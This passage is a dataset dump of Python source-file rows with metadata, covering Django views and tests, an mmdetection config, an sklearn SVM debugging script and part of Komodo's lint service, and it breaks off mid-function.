Dataset schema (one row per source file; ranges and class counts as reported by the viewer):

| Column | Type | Range / classes |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3–616 |
| content_id | string | length 40 |
| detected_licenses | sequence | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 to 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 to 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 to 2023-09-06 01:08:06 |
| github_id | int64 (nullable) | 4.92k to 681M |
| star_events_count | int64 | 0 to 209k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] (nullable) | 2012-06-04 01:52:49 to 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] (nullable) | 2008-05-22 07:58:19 to 2023-08-21 12:35:19 |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 to 10.2M |
| extension | string | 188 classes |
| content | string | length 3–10.2M |
| authors | sequence | length 1 |
| author_id | string | length 1–132 |

The raw rows follow, pipe-separated in the column order above.
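For readers who want to work with rows like the ones below, a minimal loading sketch; the dataset id is a placeholder (substitute the actual repository), and streaming avoids materializing every row:

```python
from datasets import load_dataset

# Hypothetical dataset id; replace with the real repository name.
ds = load_dataset("org/stack-python-subset", split="train", streaming=True)

# Keep only permissively licensed, non-vendored, non-generated files.
keep = ds.filter(
    lambda row: row["license_type"] == "permissive"
    and not row["is_vendor"]
    and not row["is_generated"]
)

for row in keep.take(3):
    print(row["repo_name"], row["path"], row["length_bytes"])
```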
01ed2276aaa8ccf051e68654900f77f99150ae15 | 4de03eecadc4c69caf792f4773571c2f6dbe9d68 | /tests/seahub/share/views/test_send_shared_link.py | c265c943065929d26d603cb4f387bfa7dd71b7aa | [
"Apache-2.0"
] | permissive | Tr-1234/seahub | c1663dfd12f7584f24c160bcf2a83afdbe63a9e2 | ed255e0566de054b5570218cb39cc320e99ffa44 | refs/heads/master | 2022-12-23T16:20:13.138757 | 2020-10-01T04:13:42 | 2020-10-01T04:13:42 | 300,138,290 | 0 | 0 | Apache-2.0 | 2020-10-01T04:11:41 | 2020-10-01T04:11:40 | null | UTF-8 | Python | false | false | 3,204 | py | from mock import patch
from django.core import mail
from django.core.urlresolvers import reverse
from django.test import override_settings
from seahub.profile.models import Profile
from seahub.profile.utils import refresh_cache
from seahub.test_utils import BaseTestCase
class SendSharedLinkTest(BaseTestCase):
def setUp(self):
mail.outbox = []
@override_settings(DEFAULT_FROM_EMAIL='[email protected]')
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
def test_can_send(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == '[email protected]'
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == self.user.email
assert mail.outbox[0].extra_headers['Reply-to'] == self.user.email
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite_contact_email(self):
self.login_as(self.user)
nickname = 'Testuser'
contact_email = '[email protected]'
p = Profile.objects.add_or_update(self.user.email, nickname=nickname)
p.contact_email = contact_email
p.save()
refresh_cache(self.user.email)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == contact_email
assert mail.outbox[0].extra_headers['Reply-to'] == contact_email
| [
"[email protected]"
] | |
775b26f16fa53c27ec712bf92cfb31553c92f19d | e24511af0fdf299130fdf1e27b7eda1e35064e7c | /app/coupon/apps.py | bab96066b77b4592b0cf454c6ef51fa085d53a67 | [] | no_license | amitbhalla/lms | 623dc6764dba5ee67a7f30d3882b7917b6441c2e | 0810a875008b371a7bd3996742ad3b04ce037b14 | refs/heads/main | 2023-07-19T12:12:40.570958 | 2021-09-17T16:55:29 | 2021-09-17T16:55:29 | 405,055,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | from django.apps import AppConfig
class CouponConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "coupon"
| [
"[email protected]"
] | |
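A quick note on the `CouponConfig` above: it only takes effect once the app is listed in the project settings. A minimal sketch, assuming the standard Django layout (app names inferred from the repo paths):

```python
# settings.py (sketch)
INSTALLED_APPS = [
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "coupon",  # Django discovers CouponConfig from coupon/apps.py
]
```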
84340a119e8fdb72320174077f9aa1c0605ca64f | 9d566e153a254390ed758f4e945781899b6dcd07 | /03_django/02_django_crud/articles/views.py | e9c78e872870c579df912051bc9513f1f01afb88 | [] | no_license | baambox5/TIL | 6f1b0fdc342ed29b85a68404b916fc6f4cace7bf | 0419779ccbf506a1e89d581b98658dd07b78388c | refs/heads/master | 2023-01-13T01:14:08.125234 | 2020-01-17T14:36:34 | 2020-01-17T14:36:34 | 195,918,108 | 0 | 0 | null | 2023-01-07T11:27:08 | 2019-07-09T02:31:02 | Jupyter Notebook | UTF-8 | Python | false | false | 2,964 | py | from IPython import embed
from django.core.exceptions import ValidationError
from django.shortcuts import render, redirect
from .models import Article, Comment
# Create your views here.
def index(request):
# articles = Article.objects.all()
articles = Article.objects.order_by('-pk') # ordering done by the DB (preferred when possible)
# articles = Article.objects.all()[::-1] # ordering done in Python
context = {'articles': articles,}
return render(request, 'articles/index.html', context)
def create(request):
# CREATE
if request.method == 'POST':
title = request.POST.get('title')
content = request.POST.get('content')
image = request.FILES.get('image')
# 1
# article = Article()
# article.title = title
# article.content = content
# article.save()
# 2
article = Article(title=title, content=content, image=image)
article.save()
# 3
# Article.objects.create(title=title, content=content)
return redirect(article) # main page
# return redirect('/articles/', article.pk)
# NEW
else:
return render(request, 'articles/create.html')
def detail(request, article_pk):
article = Article.objects.get(pk=article_pk)
comments = article.comment_set.all()
context = {'article': article, 'comments': comments,}
return render(request, 'articles/detail.html', context)
def delete(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.delete()
return redirect('articles:index')
else:
return redirect(article)
def update(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.title = request.POST.get('title')
article.content = request.POST.get('content')
article.image = request.FILES.get('image')
article.save()
return redirect(article)
else:
context = {'article': article,}
return render(request, 'articles/update.html', context)
def comments_create(request, article_pk):
# the article being commented on
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
# comment data submitted via the form
content = request.POST.get('content')
# create and save the comment
comment = Comment(article=article, content=content)
comment.save()
return redirect(article)
# return redirect('articles:detail', article.pk)
# return redirect('articles:detail' article_pk)
else:
return redirect(article)
def comments_delete(request, article_pk, comment_pk):
# article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
comment = Comment.objects.get(pk=comment_pk)
comment.delete()
# return redirect(article)
return redirect('articles:detail', article_pk) | [
"[email protected]"
] | |
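One note on the views above: `Article.objects.get(pk=...)` raises an unhandled `DoesNotExist` (a server error) for a bad id; the common Django idiom returns a 404 instead. A sketch of the same `detail` view with that change:

```python
from django.shortcuts import get_object_or_404, render

def detail(request, article_pk):
    # 404 instead of a 500 when the pk does not exist
    article = get_object_or_404(Article, pk=article_pk)
    comments = article.comment_set.all()
    context = {'article': article, 'comments': comments}
    return render(request, 'articles/detail.html', context)
```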
a3cf7cefbf7e8537e0c1fe7a704c4158e33f881b | 39e03684081b27311385a0ab31afcc2e09883e5c | /configs/reppoints/bbox_r50_grid_center_fpn_1x.py | f971b5b7b8c78a6abca727e7015b96d085b5f33b | [
"MIT",
"Python-2.0"
] | permissive | witnessai/MMSceneGraph | 8d0b2011a946ddcced95fbe15445b7f4da818509 | bc5e0f3385205404c712ae9f702a61a3191da0a1 | refs/heads/master | 2023-08-12T06:54:00.551237 | 2021-10-12T03:04:21 | 2021-10-12T03:04:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,462 | py | # model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=81,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='minmax',
use_grid_points=True))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/bbox_r50_grid_center_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
| [
"[email protected]"
] | |
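Configs like the one above are plain Python consumed by the training scripts; a minimal sketch of inspecting one programmatically with the mmcv API of that era (assuming mmcv is installed):

```python
from mmcv import Config

cfg = Config.fromfile("configs/reppoints/bbox_r50_grid_center_fpn_1x.py")
print(cfg.model.bbox_head.num_points)  # 9
print(cfg.total_epochs)                # 12
```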
848b91f09b40a31a3b9e5798f08cb9dc68841a53 | bd8b3d43a465b26f0d86a3007b41d6a3c22345a6 | /svsutils/iterators/__init__.py | 6bde41920adb8b8446e1ce7254e5cba9a485b1fe | [] | no_license | nathanin/svsutils | aed5d361ff4716390e093d6bab6bf3cc6dd69a9b | 5789c3e589ce9244b21a24d6cdc3909bc4e04517 | refs/heads/master | 2020-06-25T06:06:37.019860 | 2019-12-17T05:08:35 | 2019-12-17T05:08:35 | 199,225,548 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | from .iterator_factory import PythonIterator, TensorflowIterator
__all__ = [
'PythonIterator',
'TensorflowIterator'
] | [
"[email protected]"
] | |
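The `__all__` list above pins down what a wildcard import exposes; a quick illustration:

```python
from svsutils.iterators import *  # brings in only PythonIterator and TensorflowIterator

# Names not listed in __all__ stay out of the wildcard namespace,
# though they can still be imported explicitly from iterator_factory.
```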
0187aa1b8fa9854b1f253d952bda031992f4b423 | 20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7 | /old/pddbm/bug3.py | 7d0a81d444b74c37e2e621dc7a08f50608b54c18 | [] | no_license | sarahboufelja54/galatea | f5664f0b3117629b2c5bbe078a1bd52bb5e359e6 | 002a9f2905868be25b71770190fb2d5eda11c861 | refs/heads/master | 2020-12-04T13:45:07.697189 | 2018-12-12T16:27:09 | 2018-12-12T16:27:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,268 | py | import numpy as np
from sklearn.svm import SVC
import time
rng = np.random.RandomState([1,2,3])
m = 1000
n = 1000
X = rng.randn(m,n)
w = rng.randn(n)
b = rng.randn(1)
y = (np.dot(X,w) + b ) > 0
t1 = time.time()
svm = SVC(kernel = 'linear', C = 1.0).fit(X,y)
t2 = time.time()
print 'train time ',t2 - t1
t1 = time.time()
y1 = svm.predict(X)
t2 = time.time()
print 'predict time ',t2 - t1
print '# support vectors:',svm.n_support_
print 'predict time per support vector:',(t2-t1)/float(svm.n_support_.sum())
coef = svm.coef_[0,:]
orig_coef = svm.coef_
t1 = time.time()
f = - np.dot(X, orig_coef.T) + svm.intercept_
y2 = f < 0
print y.shape
print y2.shape
print (y2 == y).shape
quit(-1)
t2 = time.time()
print 'dot product time',t2 -t1
print 'class 1 prevalence ',y.mean()
print 'predict accuracy ',(y1 == y).mean()
print 'dot product accuracy ',(y2 == y).mean()
print 'predict and dot agreement rate',(y1 == y2).mean()
coefs = svm.dual_coef_
assert len(coefs.shape) == 2
assert coefs.shape[0] == 1
coefs = coefs[0,:]
w = np.dot(svm.support_vectors_.T, coefs)
assert np.allclose(w,-coef)
f = np.dot(X,w) + b
y3 = (f < 0)
print 'agreement rate with my method: ',(y3 == y1).mean()
print 'dot prod between sklearn coef_ and my coef_: ',np.dot(w,svm.coef_[0,:])
| [
"[email protected]"
] | |
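The shape prints and `quit(-1)` above mark the likely point of this repro: `f = -np.dot(X, orig_coef.T) + svm.intercept_` has shape `(m, 1)`, so `y2` is `(m, 1)` while `y` is `(m,)`, and `y2 == y` broadcasts to an `(m, m)` matrix rather than an elementwise comparison. A minimal illustration:

```python
import numpy as np

y = np.zeros(3)        # shape (3,)
y2 = np.zeros((3, 1))  # shape (3, 1)
print((y2 == y).shape)           # (3, 3): broadcast, not elementwise
print((y2.ravel() == y).shape)   # (3,): the intended comparison
```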
244651275300889c2f7a9b4928af9c1940ad6614 | 4be9a5bdb8e051001b78c8f127ccc1a7f85c14e7 | /bugzilla/migrations/0002_auto_20170205_1515.py | 6b518a7b30a1bea8b1cda0d937046f6fe0febbe5 | [] | no_license | quentin-david/heimdall | f72a85606e7ab53683df2023ef5eaba762198211 | 84a429ee52e1891bc2ee4eb07a084dff209c789c | refs/heads/master | 2021-01-21T10:26:28.895663 | 2017-07-21T19:19:46 | 2017-07-21T19:19:46 | 83,432,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-05 15:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bugzilla', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bugzilla',
options={'ordering': ['-date_update']},
),
migrations.AlterField(
model_name='bugzilla',
name='state',
field=models.CharField(choices=[('open', 'Open'), ('close', 'Close'), ('info', 'Info')], max_length=15),
),
]
| [
"[email protected]"
] | |
2eeceb42de2ea27fde10e7e6d5c08914488ee6c5 | b4da2201d2df789e28472aeded28720d5269ade5 | /Komodo-Edit-7/lib/mozilla/components/koLintService.py | 4e543d65bce81928a8d67a2192aeee69c031327d | [] | no_license | AeonSaber/first_app | 5ad89d4fb05d7662e2a39ce68176f43f1e618bf0 | 522fdfa6d33419fd49e431766fff85b40d21e78e | refs/heads/master | 2020-06-12T17:22:09.786142 | 2013-09-09T23:57:51 | 2013-09-09T23:57:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,788 | py | #!python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is Komodo code.
#
# The Initial Developer of the Original Code is ActiveState Software Inc.
# Portions created by ActiveState Software Inc are Copyright (C) 2000-2007
# ActiveState Software Inc. All Rights Reserved.
#
# Contributor(s):
# ActiveState Software Inc
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
import os, sys
import threading
import time
import urllib2
from xpcom import components, nsError, ServerException, COMException
from xpcom._xpcom import PROXY_SYNC, PROXY_ALWAYS, PROXY_ASYNC, getProxyForObject
from xpcom.server import WrapObject, UnwrapObject
from koLintResult import KoLintResult, getProxiedEffectivePrefs
from koLintResults import koLintResults
import logging
log = logging.getLogger("koLintService")
#log.setLevel(logging.DEBUG)
class RequestQueue:
# This is a modification if Python's std Queue.Queue class:
# - drop maxsize related stuff
# - calls are always blocking
# - add .prepend() and .remove_uid()
def __init__(self):
import thread
self._init()
self.mutex = thread.allocate_lock()
self.esema = thread.allocate_lock() # if acquired, then queue is empty
self.esema.acquire()
def put(self, item):
"""Put an item into the queue."""
log.debug("in RequestQueue.put, acquiring mutex")
self.mutex.acquire()
log.debug("in RequestQueue.put, acquired mutex")
try:
was_empty = self._empty()
self._append(item)
# If we fail before here, the empty state has
# not changed, so we can skip the release of esema
if was_empty:
log.debug("in RequestQueue.put, releasing esema")
self.esema.release()
finally:
# Catching system level exceptions here (RecursionDepth,
# OutOfMemory, etc) - so do as little as possible in terms
# of Python calls.
log.debug("in RequestQueue.put, releasing mutex")
self.mutex.release()
def prepend(self, item):
"""Prepend an item to the queue."""
log.debug("in RequestQueue.prepend, acquiring mutex")
self.mutex.acquire()
log.debug("in RequestQueue.prepend, acquired mutex")
try:
was_empty = self._empty()
self._prepend(item)
# If we fail before here, the empty state has
# not changed, so we can skip the release of esema
if was_empty:
log.debug("in RequestQueue.prepend, releasing esema")
self.esema.release()
finally:
# Catching system level exceptions here (RecursionDepth,
# OutOfMemory, etc) - so do as little as possible in terms
# of Python calls.
log.debug("in RequestQueue.prepend, releasing mutex")
self.mutex.release()
def get(self):
"""Remove and return an item from the queue.
Block if necessary until an item is available.
"""
log.debug("in RequestQueue.get, acquiring esema")
self.esema.acquire()
log.debug("in RequestQueue.get, acquired esema")
log.debug("in RequestQueue.get, acquiring mutex")
self.mutex.acquire()
log.debug("in RequestQueue.get, acquired mutex")
release_esema = 1
try:
item = self._get()
# Failure means empty state also unchanged - release_esema
# remains true.
release_esema = not self._empty()
finally:
if release_esema:
log.debug("in RequestQueue.get, releasing esema")
self.esema.release()
log.debug("in RequestQueue.get, releasing mutex")
self.mutex.release()
return item
def remove_uid(self, uid):
"""Remove all current requests with the given uid.
Does not return anything.
"""
log.debug("in RequestQueue.remove_uid, acquiring esema")
if not self.esema.acquire(0): # do not block to acquire lock
# return if could not acquire: means queue is empty and
# therefore do not have any items to remove
log.debug("in RequestQueue.remove_uid, did not acquire esema")
return
log.debug("in RequestQueue.remove_uid, acquired mutex")
log.debug("in RequestQueue.remove_uid, acquiring mutex")
self.mutex.acquire()
release_esema = 1
try:
self._remove_uid(uid)
# Failure means empty state also unchanged - release_esema
# remains true.
release_esema = not self._empty()
finally:
if release_esema:
log.debug("in RequestQueue.remove_uid, releasing esema")
self.esema.release()
log.debug("in RequestQueue.remove_uid, releasing mutex")
self.mutex.release()
#---- Override these methods to implement other queue organizations
# (e.g. stack or priority queue). These will only be called with
# appropriate locks held.
# Initialize the queue representation
def _init(self):
self.queue = []
# Check whether the queue is empty
def _empty(self):
return not self.queue
# Put a new item in the queue
def _append(self, item):
self.queue.append(item)
def _prepend(self, item):
self.queue.insert(0, item)
# Get an item from the queue
def _get(self):
item = self.queue[0]
del self.queue[0]
return item
# Remove all requests with the given uid.
def _remove_uid(self, uid):
self.queue = [item for item in self.queue
if hasattr(item, "uid") and item.uid != uid]
class _GenericAggregator(object):
_com_interfaces_ = [components.interfaces.koILinter]
_reg_desc_ = "Komodo Generic Aggregate Linter"
_reg_clsid_ = "{b68f4ff8-f37e-45d1-970e-88b964e7096d}"
_reg_contractid_ = "@activestate.com/koGenericLinterAggregator;1"
def initialize(self, languageName, koLintService):
self._languageName = languageName
self._koLintService = koLintService
def lint(self, request):
text = request.content.encode(request.encoding.python_encoding_name)
return self.lint_with_text(request, text)
def lint_with_text(self, request, text):
linters = self._koLintService.getTerminalLintersForLanguage(self._languageName)
finalLintResults = koLintResults()
for linter in linters:
try:
newLintResults = UnwrapObject(linter).lint_with_text(request, text)
except:
log.exception("lint_with_text exception")
else:
if newLintResults and newLintResults.getNumResults():
if finalLintResults.getNumResults():
finalLintResults = finalLintResults.addResults(newLintResults)
else:
finalLintResults = newLintResults
return finalLintResults
class KoLintRequest:
_com_interfaces_ = [components.interfaces.koILintRequest]
_reg_desc_ = "Komodo Lint Request"
_reg_clsid_ = "{845A872F-293F-4a82-8552-40849A92EC80}"
_reg_contractid_ = "@activestate.com/koLintRequest;1"
def __init__(self):
self.rid = None
self._koDoc = None
self.uid = ''
self.linterType = ''
self.cwd = ''
self.content = None
self.encoding = None
self.linter = None
self.results = None
self.errorString = ''
@property
def document(self):
import warnings
warnings.warn("`koILintRequest.document` was DEPRECATED in Komodo "
"6.0.0b1, use `koILintRequest.koDoc`.",
DeprecationWarning)
return self.koDoc
@property
def koDoc(self):
return self._koDoc
def get_koDoc(self):
return self._koDoc
def set_koDoc(self, val):
# Access to the koDoc *must* be from the main thread, otherwise
# Komodo may crash!
self._koDoc = getProxyForObject(1,
components.interfaces.koIDocument, val,
PROXY_ALWAYS | PROXY_SYNC)
def describe(self):
return "<KoLintRequest: %s on uid %s>" % (self.linterType, self.uid)
class KoLintService:
_com_interfaces_ = [components.interfaces.koILintService,
components.interfaces.nsIObserver]
_reg_desc_ = "Komodo Lint Management Service"
_reg_clsid_ = "{9FD67601-CB60-411D-A212-ED21B3D25C15}"
_reg_contractid_ = "@activestate.com/koLintService;1"
def __init__(self):
log.info("KoLintService.__init__()")
self._linterCache = {} # mapping of linterCID to koILinter instance
self.requests = RequestQueue() # an item of None is the quit sentinel
self._shuttingDown = 0
self.manager = threading.Thread(target=self.run, name="Linter")
self.manager.setDaemon(True)
self.manager.start()
self._wrapped = WrapObject(self, components.interfaces.nsIObserver)
_observerSvc = components.classes["@mozilla.org/observer-service;1"].\
getService(components.interfaces.nsIObserverService)
_observerSvc.addObserver(self._wrapped, 'xpcom-shutdown', 1)
self._prefs = components.classes["@activestate.com/koPrefService;1"].\
getService(components.interfaces.koIPrefService).prefs
# dict of { 'terminals' => array of linters, 'aggregators' => array of linters }
self._linterCIDsByLanguageName = {}
# Init it now, pay the price of walking through the categories now...
catman = components.classes["@mozilla.org/categorymanager;1"].\
getService(components.interfaces.nsICategoryManager)
categoryName = 'category-komodo-linter-aggregator'
names = catman.enumerateCategory(categoryName)
while names.hasMoreElements():
nameObj = names.getNext()
rawName, fixedName = self._getCategoryNameFromNameObj(nameObj)
cid = catman.getCategoryEntry(categoryName, rawName)
if not self._linterCIDsByLanguageName.has_key(fixedName):
self._linterCIDsByLanguageName[fixedName] = {'terminals':[],
'aggregator':cid}
else:
log.warn("Possible Problem: more than one entry for linter aggregator %s (was %s), now %s",
fixedName,
self._linterCIDsByLanguageName[fixedName]['aggregator'],
cid)
self._linterCIDsByLanguageName[fixedName]['aggregator'] = cid
categoryName = 'category-komodo-linter'
names = catman.enumerateCategory(categoryName)
while names.hasMoreElements():
nameObj = names.getNext()
rawName, fixedName = self._getCategoryNameFromNameObj(nameObj)
idx = fixedName.find("&type=")
if idx == -1:
languageName = fixedName
else:
languageName = fixedName[:idx]
cid = catman.getCategoryEntry(categoryName, rawName)
if not self._linterCIDsByLanguageName.has_key(languageName):
self._linterCIDsByLanguageName[languageName] = {'terminals':[],
'aggregator':None}
self._linterCIDsByLanguageName[languageName]['terminals'].append(cid)
#log.debug("Loaded these linters: %s", self._linterCIDsByLanguageName)
def _getCategoryNameFromNameObj(self, nameObj):
nameObj.QueryInterface(components.interfaces.nsISupportsCString)
rawName = nameObj.data
try:
fixedName = urllib2.unquote(rawName)
except:
fixedName = rawName
return rawName, fixedName
def getLinter_CID_ForLanguage(self, languageName):
return self._getLinterCIDByLanguageName(languageName)
def observe(self, subject, topic, data):
#print "file status service observed %r %s %s" % (subject, topic, data)
if topic == 'xpcom-shutdown':
log.debug("file status got xpcom-shutdown, unloading");
self.terminate()
def terminate(self):
log.info("KoLintService.terminate()")
self.requests.prepend(None) # prepend the quit sentinel
self._shuttingDown = 1
# Do NOT attempt to .join() the manager thread because it is nigh on
# impossible to avoid all possible deadlocks.
def getTerminalLintersForLanguage(self, languageName):
return [self._getLinterByCID(cid)
for cid in self._linterCIDsByLanguageName[languageName]['terminals']]
GENERIC_LINTER_AGGREGATOR_CID = "@activestate.com/koGenericLinterAggregator;1"
def _getLinterCIDByLanguageName(self, languageName):
try:
linters = self._linterCIDsByLanguageName[languageName]
except KeyError:
self._linterCIDsByLanguageName[languageName] = {'aggregator':None,
'terminals':[],
'generated':True}
return None
# If there's no explicit aggregator, return the first terminal linter.
# If there isn't one, throw the ItemError all the way to top-level
if linters['aggregator'] is not None:
return linters['aggregator']
if len(linters['terminals']) != 1:
if len(linters['terminals']) == 0:
if not linters.get('generated', False):
log.error("No terminal linters for lang %s", languageName)
return None
# Create a generic aggregator for this language.
linters['aggregator'] = (self.GENERIC_LINTER_AGGREGATOR_CID
+ ":" + languageName)
return linters['aggregator']
return linters['terminals'][0]
def getLinterForLanguage(self, languageName):
"""Return a koILinter XPCOM component of the given linterCID.
This method cache's linter instances. If there is no such linter
then an exception is raised.
Note that aggregators are favored over terminal linters.
"""
linterCID = self._getLinterCIDByLanguageName(languageName)
if linterCID is None:
return None
return self._getLinterByCID(linterCID)
def _getLinterByCID(self, linterCID):
if linterCID not in self._linterCache:
try:
if linterCID.startswith(self.GENERIC_LINTER_AGGREGATOR_CID):
languageName = linterCID[len(self.GENERIC_LINTER_AGGREGATOR_CID) + 1:]
linter = components.classes[self.GENERIC_LINTER_AGGREGATOR_CID].createInstance(components.interfaces.koILinter)
UnwrapObject(linter).initialize(languageName, self)
elif linterCID not in components.classes.keys():
linter = None
else:
